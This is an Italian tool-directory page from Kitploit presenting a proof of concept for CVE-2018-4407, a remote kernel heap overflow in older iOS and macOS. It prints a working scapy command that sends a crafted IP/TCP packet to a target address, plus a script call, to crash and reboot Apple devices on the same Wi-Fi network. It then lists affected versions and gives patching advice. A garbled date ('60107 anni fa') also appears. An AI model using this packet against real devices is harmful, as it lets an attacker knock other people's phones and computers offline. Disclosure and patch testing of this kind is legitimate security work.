Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
check_icmp_dos — iOS 12 / OS X Overflow dello heap del kernel remoto (CVE-2018-4407) POC | Kitploit
Strumenti/GitHubGitHub/pa55w0rd/check_icmp_dos
Sicurezza iOSAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingSicurezza Mobile
GitHubpa55w0rd/check_icmp_dos

check_icmp_dos

iOS 12 / OS X Overflow dello heap del kernel remoto (CVE-2018-4407) POC

Vedi Repository
60107 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

check_icmp_dos

iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:

root@kitploit:~
pip install scapy
sudo scapy 
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

o utilizzando lo script

root@kitploit:~
python check_icmp_dos.py 127.0.0.1

Questa vulnerabilità consente a un aggressore, semplicemente connettendosi alla stessa rete Wi-Fi, di inviare pacchetti dannosi ad altri utenti ignari per causare il crash e il riavvio di qualsiasi dispositivo Mac o iOS. Poiché la vulnerabilità risiede nel codice core della rete di sistema, nessun software antivirus è in grado di difendersi.

I dispositivi che eseguono i seguenti sistemi operativi sono vulnerabili:

root@kitploit:~
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

Raccomandazioni per la correzione

Attualmente, Apple ha rilasciato un aggiornamento alla versione iOS 12.1 che corregge la vulnerabilità. Si consiglia agli utenti di verificare la versione del sistema e, se interessati, di adottare tempestivamente le misure correttive. Le misure di correzione della vulnerabilità sono le seguenti:

  1. Eseguire l'aggiornamento del sistema all'ultima versione.
  2. Se non si è ancora aggiornati all'ultima versione, abilitare la modalità nascosta nel firewall di macOS per prevenire gli attacchi. Questa impostazione di sistema non è abilitata per impostazione predefinita; deve essere attivata manualmente dall'utente.
  3. Non connettersi a reti Wi-Fi pubbliche. L'unica condizione necessaria per sfruttare questa vulnerabilità è essere sulla stessa rete; la vulnerabilità non può essere attivata tramite l'invio di pacchetti dannosi via Internet.
Scarica lo strumento